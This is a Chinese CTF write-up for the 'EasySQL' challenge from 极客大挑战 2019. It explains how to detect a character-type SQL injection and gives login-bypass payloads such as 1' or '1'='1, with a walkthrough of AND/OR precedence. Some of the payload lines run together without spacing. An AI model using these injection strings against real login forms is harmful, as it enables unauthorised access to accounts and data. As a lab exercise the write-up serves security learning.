[极客大挑战 2019] EasySQL
判断是数字还是字符型注入
正常查询的回显
输入字符型判断一下,发现报错了,看报错显示 ‘1’‘’,输入的是1’,这里查询语句中应该是存在一个单引号的,所以这里报错了,多了一个单引号,说明这里存在字符型的注入,先用万能钥匙测测
使用万能钥匙一测,第一次 正常回显错误,然后又用字符型的测了一下,发现这里的报错中带有 一部分的查询语句
# 万能公式1and1=11' and '1'='11or1=11' or '1'='1
为什么用 1’ and ‘1’='1不行呢?
测试的时候输入了 1’ and ‘1’=1这个有问题的payload,看报错信息中带有一个 and password=‘1’ and ‘1’=1 说明sql语句是SELECT * FROM tables WHERE username=‘1’ and ‘1’=1 and password=‘1’ and ‘1’=1 类似这样的查询,and 的两边同时为TRUE 结果才能为 TRUE,所以输入的payload一定要符合这个条件就可以登录成功了。
# payloadSELECT*FROMtablesWHERE username='1'or'1'='1'and password='1'or'1'='1'# 优先级排序:and 优先级高于 or,所以要计算 and 然后再计算 or
username='1'--->false'1'='1'---> true
passwrod='1'--->false'1'='1'--->truefalseor(trueandfalse)ortruefalseorfalseortruefalseortrue#得出结果:true
照这种方法就可以推算出不同的解法
# payload1# 用户名:1' and '1'='1# 密码:1' or '1'='1# payload2# 用户名:1' and '1'='2# 密码:1' or '1'='1# 本质上都是利用 and 和 or 的优先级进行判断,只要返回 TRUE 就没问题
版权归原作者 iKnsec 所有, 如有侵权,请联系我们删除。